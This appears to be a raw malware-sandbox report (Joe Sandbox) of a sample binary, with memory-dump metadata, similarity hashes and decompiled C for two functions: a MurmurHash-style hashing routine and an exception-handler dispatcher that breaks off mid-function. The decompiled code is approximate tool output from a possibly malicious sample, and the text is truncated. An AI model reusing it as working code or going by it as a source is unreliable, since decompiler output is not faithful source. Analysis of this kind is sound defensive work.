                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004089a8
                                                                                                                                                                                                                                                                                    0x004089a8
                                                                                                                                                                                                                                                                                    0x004089a8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004089a6
                                                                                                                                                                                                                                                                                    0x00408988
                                                                                                                                                                                                                                                                                    0x004089b3
                                                                                                                                                                                                                                                                                    0x004089bc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040894C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: HeapsProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1420622215-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 398c00615c73b9a85a2b98cb4f2c7559d965eb21afa17a522cad4f920a78b4b0
                                                                                                                                                                                                                                                                                    • Instruction ID: 785f260148ae9ae4597d64fcfe5756ded850402a79d19a0c46507e0d49a2d579
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 398c00615c73b9a85a2b98cb4f2c7559d965eb21afa17a522cad4f920a78b4b0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA01DAF4904118CADB20DB14DB847B9B7B4AB84304F1482EADB8976381C6781EC6DF9E
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                    			E00408FA0(signed int __edx, intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                                                    				signed char* _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                                                                                    				signed int _t306;
                                                                                                                                                                                                                                                                                    				signed int _t336;
                                                                                                                                                                                                                                                                                    				void* _t502;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v72 = 0;
                                                                                                                                                                                                                                                                                    				_v60 = _a4;
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_v36 = _a8 + (__edx & 0x0000000f) >> 4;
                                                                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				_v24 = 0x239b961b;
                                                                                                                                                                                                                                                                                    				_v32 = 0xab0e9789;
                                                                                                                                                                                                                                                                                    				_v16 = 0x38b34ae5;
                                                                                                                                                                                                                                                                                    				_v64 = 0xa1e38b93;
                                                                                                                                                                                                                                                                                    				_v44 = (_v36 << 4) + _v60;
                                                                                                                                                                                                                                                                                    				_v76 =  ~_v36;
                                                                                                                                                                                                                                                                                    				while(_v76 != 0) {
                                                                                                                                                                                                                                                                                    					_v92 = E00408DE0(_v44, _v76 << 2);
                                                                                                                                                                                                                                                                                    					_v88 = E00408DE0(_v44, 1 + _v76 * 4);
                                                                                                                                                                                                                                                                                    					_v84 = E00408DE0(_v44, 2 + _v76 * 4);
                                                                                                                                                                                                                                                                                    					_t336 = E00408DE0(_v44, 3 + _v76 * 4);
                                                                                                                                                                                                                                                                                    					_t502 = _t502 + 0x20;
                                                                                                                                                                                                                                                                                    					_v80 = _t336;
                                                                                                                                                                                                                                                                                    					_v92 = _v92 * 0x239b961b;
                                                                                                                                                                                                                                                                                    					asm("rol ecx, 0xf");
                                                                                                                                                                                                                                                                                    					_v92 = _v92 * 0xab0e9789;
                                                                                                                                                                                                                                                                                    					_v20 = _v20 ^ _v92;
                                                                                                                                                                                                                                                                                    					asm("rol ecx, 0x13");
                                                                                                                                                                                                                                                                                    					_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                                    					_v20 = 0x561ccd1b + _v20 * 5;
                                                                                                                                                                                                                                                                                    					_v88 = _v88 * 0xab0e9789;
                                                                                                                                                                                                                                                                                    					asm("rol edx, 0x10");
                                                                                                                                                                                                                                                                                    					_v88 = _v88 * 0x38b34ae5;
                                                                                                                                                                                                                                                                                    					_v8 = _v8 ^ _v88;
                                                                                                                                                                                                                                                                                    					asm("rol edx, 0x11");
                                                                                                                                                                                                                                                                                    					_v8 = _v8 + _v48;
                                                                                                                                                                                                                                                                                    					_v8 = 0xbcaa747 + _v8 * 5;
                                                                                                                                                                                                                                                                                    					_v84 = _v84 * 0x38b34ae5;
                                                                                                                                                                                                                                                                                    					asm("rol eax, 0x11");
                                                                                                                                                                                                                                                                                    					_v84 = _v84 * 0xa1e38b93;
                                                                                                                                                                                                                                                                                    					_v48 = _v48 ^ _v84;
                                                                                                                                                                                                                                                                                    					asm("rol eax, 0xf");
                                                                                                                                                                                                                                                                                    					_v48 = _v48 + _v40;
                                                                                                                                                                                                                                                                                    					_v48 = _v48 * 5 - 0x6932e3cb;
                                                                                                                                                                                                                                                                                    					_v80 = _v80 * 0xa1e38b93;
                                                                                                                                                                                                                                                                                    					asm("rol ecx, 0x12");
                                                                                                                                                                                                                                                                                    					_v80 = _v80 * 0x239b961b;
                                                                                                                                                                                                                                                                                    					_v40 = _v40 ^ _v80;
                                                                                                                                                                                                                                                                                    					asm("rol ecx, 0xd");
                                                                                                                                                                                                                                                                                    					_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                                    					_v40 = 0x32ac3b17 + _v40 * 5;
                                                                                                                                                                                                                                                                                    					_v76 = _v76 + 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v28 = (_v36 << 4) + _v60;
                                                                                                                                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                                                                                                                    				_v52 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v96 = _a8 & 0x0000000f;
                                                                                                                                                                                                                                                                                    				_v96 = _v96 - 1;
                                                                                                                                                                                                                                                                                    				if(_v96 <= 0xe) {
                                                                                                                                                                                                                                                                                    					switch( *((intOrPtr*)(_v96 * 4 +  &M00409484))) {
                                                                                                                                                                                                                                                                                    						case 0:
                                                                                                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                                                                                                    							_v68 =  *_v28 & 0x000000ff ^ _v68;
                                                                                                                                                                                                                                                                                    							_v68 = _v68 * 0x239b961b;
                                                                                                                                                                                                                                                                                    							asm("rol eax, 0xf");
                                                                                                                                                                                                                                                                                    							_v68 = _v68 * 0xab0e9789;
                                                                                                                                                                                                                                                                                    							_v20 = _v20 ^ _v68;
                                                                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                                                                    						case 1:
                                                                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                                                                    							_v68 = (_v28[1] & 0x000000ff) << 0x00000008 ^ _v68;
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						case 2:
                                                                                                                                                                                                                                                                                    							L18:
                                                                                                                                                                                                                                                                                    							_v68 = (_v28[2] & 0x000000ff) << 0x00000010 ^ _v68;
                                                                                                                                                                                                                                                                                    							goto L19;
                                                                                                                                                                                                                                                                                    						case 3:
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							_v68 = (_v28[3] & 0x000000ff) << 0x00000018 ^ _v68;
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						case 4:
                                                                                                                                                                                                                                                                                    							L16:
                                                                                                                                                                                                                                                                                    							_v56 = _v28[4] & 0x000000ff ^ _v56;
                                                                                                                                                                                                                                                                                    							_v56 = _v56 * 0xab0e9789;
                                                                                                                                                                                                                                                                                    							asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                                    							_v56 = _v56 * 0x38b34ae5;
                                                                                                                                                                                                                                                                                    							_v8 = _v8 ^ _v56;
                                                                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                                                                    						case 5:
                                                                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                                                                    							_v56 = (_v28[5] & 0x000000ff) << 0x00000008 ^ _v56;
                                                                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                                                                    						case 6:
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							_v56 = (_v28[6] & 0x000000ff) << 0x00000010 ^ _v56;
                                                                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                                                                    						case 7:
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							_v56 = (_v28[7] & 0x000000ff) << 0x00000018 ^ _v56;
                                                                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                                                                    						case 8:
                                                                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                                                                    							_v52 = _v28[8] & 0x000000ff ^ _v52;
                                                                                                                                                                                                                                                                                    							_v52 = _v52 * 0x38b34ae5;
                                                                                                                                                                                                                                                                                    							asm("rol eax, 0x11");
                                                                                                                                                                                                                                                                                    							_v52 = _v52 * 0xa1e38b93;
                                                                                                                                                                                                                                                                                    							_v48 = _v48 ^ _v52;
                                                                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                                                                    						case 9:
                                                                                                                                                                                                                                                                                    							L11:
                                                                                                                                                                                                                                                                                    							_v52 = (_v28[9] & 0x000000ff) << 0x00000008 ^ _v52;
                                                                                                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                                                                                                    						case 0xa:
                                                                                                                                                                                                                                                                                    							L10:
                                                                                                                                                                                                                                                                                    							_v52 = (_v28[0xa] & 0x000000ff) << 0x00000010 ^ _v52;
                                                                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                                                                    						case 0xb:
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							_v52 = (_v28[0xb] & 0x000000ff) << 0x00000018 ^ _v52;
                                                                                                                                                                                                                                                                                    							goto L10;
                                                                                                                                                                                                                                                                                    						case 0xc:
                                                                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                                                                    							_v12 = _v28[0xc] & 0x000000ff ^ _v12;
                                                                                                                                                                                                                                                                                    							_v12 = _v12 * 0xa1e38b93;
                                                                                                                                                                                                                                                                                    							asm("rol eax, 0x12");
                                                                                                                                                                                                                                                                                    							_v12 = _v12 * 0x239b961b;
                                                                                                                                                                                                                                                                                    							_v40 = _v40 ^ _v12;
                                                                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                                                                    						case 0xd:
                                                                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                                                                    							_v12 = (_v28[0xd] & 0x000000ff) << 0x00000008 ^ _v12;
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						case 0xe:
                                                                                                                                                                                                                                                                                    							_v12 = (_v28[0xe] & 0x000000ff) << 0x00000010 ^ _v12;
                                                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L21:
                                                                                                                                                                                                                                                                                    				_v20 = _v20 ^ _a8;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 ^ _a8;
                                                                                                                                                                                                                                                                                    				_v48 = _v48 ^ _a8;
                                                                                                                                                                                                                                                                                    				_v40 = _v40 ^ _a8;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v48;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v40;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                                    				_v48 = _v48 + _v20;
                                                                                                                                                                                                                                                                                    				_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                                    				_v20 = E00408DF0(_v20);
                                                                                                                                                                                                                                                                                    				_v8 = E00408DF0(_v8);
                                                                                                                                                                                                                                                                                    				_v48 = E00408DF0(_v48);
                                                                                                                                                                                                                                                                                    				_v40 = E00408DF0(_v40);
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v8;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v48;
                                                                                                                                                                                                                                                                                    				_v20 = _v20 + _v40;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 + _v20;
                                                                                                                                                                                                                                                                                    				_v48 = _v48 + _v20;
                                                                                                                                                                                                                                                                                    				_v40 = _v40 + _v20;
                                                                                                                                                                                                                                                                                    				 *_a12 = _v20;
                                                                                                                                                                                                                                                                                    				_a12[1] = _v8;
                                                                                                                                                                                                                                                                                    				_a12[2] = _v48;
                                                                                                                                                                                                                                                                                    				_t306 = _v40;
                                                                                                                                                                                                                                                                                    				_a12[3] = _t306;
                                                                                                                                                                                                                                                                                    				return _t306;
                                                                                                                                                                                                                                                                                    			}





























                                                                                                                                                                                                                                                                                    0x00408fa6
                                                                                                                                                                                                                                                                                    0x00408fb0
                                                                                                                                                                                                                                                                                    0x00408fb6
                                                                                                                                                                                                                                                                                    0x00408fbf
                                                                                                                                                                                                                                                                                    0x00408fc2
                                                                                                                                                                                                                                                                                    0x00408fc9
                                                                                                                                                                                                                                                                                    0x00408fd0
                                                                                                                                                                                                                                                                                    0x00408fd7
                                                                                                                                                                                                                                                                                    0x00408fde
                                                                                                                                                                                                                                                                                    0x00408fe5
                                                                                                                                                                                                                                                                                    0x00408fec
                                                                                                                                                                                                                                                                                    0x00408ff3
                                                                                                                                                                                                                                                                                    0x00409003
                                                                                                                                                                                                                                                                                    0x0040900b
                                                                                                                                                                                                                                                                                    0x00409019
                                                                                                                                                                                                                                                                                    0x00409036
                                                                                                                                                                                                                                                                                    0x00409050
                                                                                                                                                                                                                                                                                    0x0040906a
                                                                                                                                                                                                                                                                                    0x0040907c
                                                                                                                                                                                                                                                                                    0x00409081
                                                                                                                                                                                                                                                                                    0x00409084
                                                                                                                                                                                                                                                                                    0x00409090
                                                                                                                                                                                                                                                                                    0x00409096
                                                                                                                                                                                                                                                                                    0x004090a5
                                                                                                                                                                                                                                                                                    0x004090ae
                                                                                                                                                                                                                                                                                    0x004090b4
                                                                                                                                                                                                                                                                                    0x004090c0
                                                                                                                                                                                                                                                                                    0x004090ce
                                                                                                                                                                                                                                                                                    0x004090da
                                                                                                                                                                                                                                                                                    0x004090e0
                                                                                                                                                                                                                                                                                    0x004090ef
                                                                                                                                                                                                                                                                                    0x004090f8
                                                                                                                                                                                                                                                                                    0x004090fe
                                                                                                                                                                                                                                                                                    0x0040910a
                                                                                                                                                                                                                                                                                    0x00409119
                                                                                                                                                                                                                                                                                    0x00409125
                                                                                                                                                                                                                                                                                    0x0040912b
                                                                                                                                                                                                                                                                                    0x0040913a
                                                                                                                                                                                                                                                                                    0x00409143
                                                                                                                                                                                                                                                                                    0x00409149
                                                                                                                                                                                                                                                                                    0x00409155
                                                                                                                                                                                                                                                                                    0x00409164
                                                                                                                                                                                                                                                                                    0x00409170
                                                                                                                                                                                                                                                                                    0x00409176
                                                                                                                                                                                                                                                                                    0x00409185
                                                                                                                                                                                                                                                                                    0x0040918e
                                                                                                                                                                                                                                                                                    0x00409194
                                                                                                                                                                                                                                                                                    0x004091a0
                                                                                                                                                                                                                                                                                    0x004091ae
                                                                                                                                                                                                                                                                                    0x00409016
                                                                                                                                                                                                                                                                                    0x00409016
                                                                                                                                                                                                                                                                                    0x004091bf
                                                                                                                                                                                                                                                                                    0x004091c2
                                                                                                                                                                                                                                                                                    0x004091c9
                                                                                                                                                                                                                                                                                    0x004091d0
                                                                                                                                                                                                                                                                                    0x004091d7
                                                                                                                                                                                                                                                                                    0x004091e4
                                                                                                                                                                                                                                                                                    0x004091ed
                                                                                                                                                                                                                                                                                    0x004091f4
                                                                                                                                                                                                                                                                                    0x004091fd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409359
                                                                                                                                                                                                                                                                                    0x00409362
                                                                                                                                                                                                                                                                                    0x0040936e
                                                                                                                                                                                                                                                                                    0x00409374
                                                                                                                                                                                                                                                                                    0x00409383
                                                                                                                                                                                                                                                                                    0x0040938c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409349
                                                                                                                                                                                                                                                                                    0x00409356
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409339
                                                                                                                                                                                                                                                                                    0x00409346
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409329
                                                                                                                                                                                                                                                                                    0x00409336
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004092f2
                                                                                                                                                                                                                                                                                    0x004092fc
                                                                                                                                                                                                                                                                                    0x00409308
                                                                                                                                                                                                                                                                                    0x0040930e
                                                                                                                                                                                                                                                                                    0x0040931d
                                                                                                                                                                                                                                                                                    0x00409326
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004092e2
                                                                                                                                                                                                                                                                                    0x004092ef
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004092d2
                                                                                                                                                                                                                                                                                    0x004092df
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004092c2
                                                                                                                                                                                                                                                                                    0x004092cf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040928b
                                                                                                                                                                                                                                                                                    0x00409295
                                                                                                                                                                                                                                                                                    0x004092a1
                                                                                                                                                                                                                                                                                    0x004092a7
                                                                                                                                                                                                                                                                                    0x004092b6
                                                                                                                                                                                                                                                                                    0x004092bf
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040927b
                                                                                                                                                                                                                                                                                    0x00409288
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040926b
                                                                                                                                                                                                                                                                                    0x00409278
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040925b
                                                                                                                                                                                                                                                                                    0x00409268
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409224
                                                                                                                                                                                                                                                                                    0x0040922e
                                                                                                                                                                                                                                                                                    0x0040923a
                                                                                                                                                                                                                                                                                    0x00409240
                                                                                                                                                                                                                                                                                    0x0040924f
                                                                                                                                                                                                                                                                                    0x00409258
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409214
                                                                                                                                                                                                                                                                                    0x00409221
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409211
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004091fd
                                                                                                                                                                                                                                                                                    0x0040938f
                                                                                                                                                                                                                                                                                    0x00409395
                                                                                                                                                                                                                                                                                    0x0040939e
                                                                                                                                                                                                                                                                                    0x004093a7
                                                                                                                                                                                                                                                                                    0x004093b0
                                                                                                                                                                                                                                                                                    0x004093b9
                                                                                                                                                                                                                                                                                    0x004093c2
                                                                                                                                                                                                                                                                                    0x004093cb
                                                                                                                                                                                                                                                                                    0x004093d4
                                                                                                                                                                                                                                                                                    0x004093dd
                                                                                                                                                                                                                                                                                    0x004093e6
                                                                                                                                                                                                                                                                                    0x004093f5
                                                                                                                                                                                                                                                                                    0x00409404
                                                                                                                                                                                                                                                                                    0x00409413
                                                                                                                                                                                                                                                                                    0x00409422
                                                                                                                                                                                                                                                                                    0x0040942b
                                                                                                                                                                                                                                                                                    0x00409434
                                                                                                                                                                                                                                                                                    0x0040943d
                                                                                                                                                                                                                                                                                    0x00409446
                                                                                                                                                                                                                                                                                    0x0040944f
                                                                                                                                                                                                                                                                                    0x00409458
                                                                                                                                                                                                                                                                                    0x00409461
                                                                                                                                                                                                                                                                                    0x00409469
                                                                                                                                                                                                                                                                                    0x00409472
                                                                                                                                                                                                                                                                                    0x00409478
                                                                                                                                                                                                                                                                                    0x0040947b
                                                                                                                                                                                                                                                                                    0x00409481

                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: e342ec8ece3ea47229aff82648d4b4dd66772e33e038a648633e7687c6d9cbaa
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b88eedca40deb017cab5176b4229643bb1f3ebf536d8ecc0de915512f40f503
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e342ec8ece3ea47229aff82648d4b4dd66772e33e038a648633e7687c6d9cbaa
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83127CB4D002199FCB48CF99D991AEEFBB2BF98300F24856AE415BB345D734AA01CF54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 71%
                                                                                                                                                                                                                                                                                    			E0040ECE8(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				signed int* _t43;
                                                                                                                                                                                                                                                                                    				char _t44;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                                                                    				long _t66;
                                                                                                                                                                                                                                                                                    				signed int* _t80;
                                                                                                                                                                                                                                                                                    				signed int* _t82;
                                                                                                                                                                                                                                                                                    				void* _t84;
                                                                                                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t43 = _t84;
                                                                                                                                                                                                                                                                                    				_t65 = __ebx + 2;
                                                                                                                                                                                                                                                                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                                                                                                                                                                                                                    				_t89 = _t95;
                                                                                                                                                                                                                                                                                    				_t96 = _t95 - 8;
                                                                                                                                                                                                                                                                                    				_push(_t65);
                                                                                                                                                                                                                                                                                    				_push(_t84);
                                                                                                                                                                                                                                                                                    				_push(_t89);
                                                                                                                                                                                                                                                                                    				asm("cld");
                                                                                                                                                                                                                                                                                    				_t66 = _a8;
                                                                                                                                                                                                                                                                                    				_t44 = _a4;
                                                                                                                                                                                                                                                                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                                                                                                                                                                                                                    					_push(_t89);
                                                                                                                                                                                                                                                                                    					E0040EE73(_t66 + 0x10, _t66, 0xffffffff);
                                                                                                                                                                                                                                                                                    					_t46 = 1;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v12 = _t44;
                                                                                                                                                                                                                                                                                    					_v8 = _a12;
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                                                                                                                                                                                                                    					_t86 =  *(_t66 + 0xc);
                                                                                                                                                                                                                                                                                    					_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    					_t49 = E0040EF2D(_t66);
                                                                                                                                                                                                                                                                                    					_t99 = _t96 + 4;
                                                                                                                                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						while(_t86 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                                                                                                                                                                                                                    							if(_t53 == 0) {
                                                                                                                                                                                                                                                                                    								L8:
                                                                                                                                                                                                                                                                                    								_t80 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    								_t86 = _t80[_t86 + _t86 * 2];
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t54 =  *_t53();
                                                                                                                                                                                                                                                                                    								_t89 = _t89;
                                                                                                                                                                                                                                                                                    								_t86 = _t86;
                                                                                                                                                                                                                                                                                    								_t66 = _a8;
                                                                                                                                                                                                                                                                                    								_t55 = _t54;
                                                                                                                                                                                                                                                                                    								_t106 = _t54;
                                                                                                                                                                                                                                                                                    								if(_t106 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									if(_t106 < 0) {
                                                                                                                                                                                                                                                                                    										_t46 = 0;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										_t82 =  *(_t66 + 8);
                                                                                                                                                                                                                                                                                    										E0040EE18(_t55, _t66);
                                                                                                                                                                                                                                                                                    										_t89 = _t66 + 0x10;
                                                                                                                                                                                                                                                                                    										E0040EE73(_t89, _t66, 0);
                                                                                                                                                                                                                                                                                    										_t99 = _t99 + 0xc;
                                                                                                                                                                                                                                                                                    										E0040EF0F(_t82[2]);
